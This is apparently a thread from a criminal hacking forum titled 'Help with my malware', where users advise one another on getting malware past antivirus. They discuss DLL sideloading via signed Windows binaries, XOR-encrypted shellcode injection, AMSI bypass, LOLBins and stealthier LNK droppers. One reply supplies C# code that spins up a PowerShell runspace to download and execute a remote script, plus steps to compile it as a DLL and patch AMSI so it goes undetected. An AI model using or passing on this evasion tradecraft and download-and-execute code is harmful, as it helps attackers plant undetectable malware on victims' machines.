dll sideloading/proxying is a good method to bypass AVs just need to be careful with the shellcode and injection method
-
XSS.stack #1 – первый литературный журнал от юзеров форума
Help with my malware
- Автор темы sallynice45
- Дата начала
nope. It's awesome if you use some different tricks.ink are dead too
i use my private method and its 0/19 for now at runtime and scantime
humm i use windows officially signed exes like runtimebroker.exe etc to load dlls and inject shellcode in process with xor enc and 1st byte change, i am using stageless shellcode 180kb shellcode though too big, can you suggest me more ways? again i am not asking for your privet method
Suggest yes offcourse , if you like to use Amsi bypass you can use powershell without powershell like same project here https://xss.pro/threads/75684/humm i use windows officially signed exes like runtimebroker.exe etc to load dlls and inject shellcode in process with xor enc and 1st byte change, i am using stageless shellcode 180kb shellcode though too big, can you suggest me more ways? again i am not asking for your privet method
C#:
Runspace runspaceKhamisla = RunspaceFactory.CreateRunspace(RunspaceConfiguration.Create());
runspaceKhamisla.Open();
Pipeline pipeline = runspaceKhamisla.CreatePipeline();
pipeline.Commands.AddScript("$ps1url = '';iex(New-Object Net.WebClient).DownloadString($ps1url)");
pipeline.Invoke();but this time compile it as dll and then use ildasm and edit the .il file and export the function manualy , then patch amsi here it will give you fud 100%
LOLBAS
lolbas-project.github.io
try using different LOLBINs (living of land binaries) and find one that is recently added or found, and also add some obfuscation or more layers between your LNK and downloading your file.
i haven't taken a look at your lNK but from other replies, im assuming it's downloading the stub directly. try having it create a js/ps1 file instead where it can execute the download with more sophistication.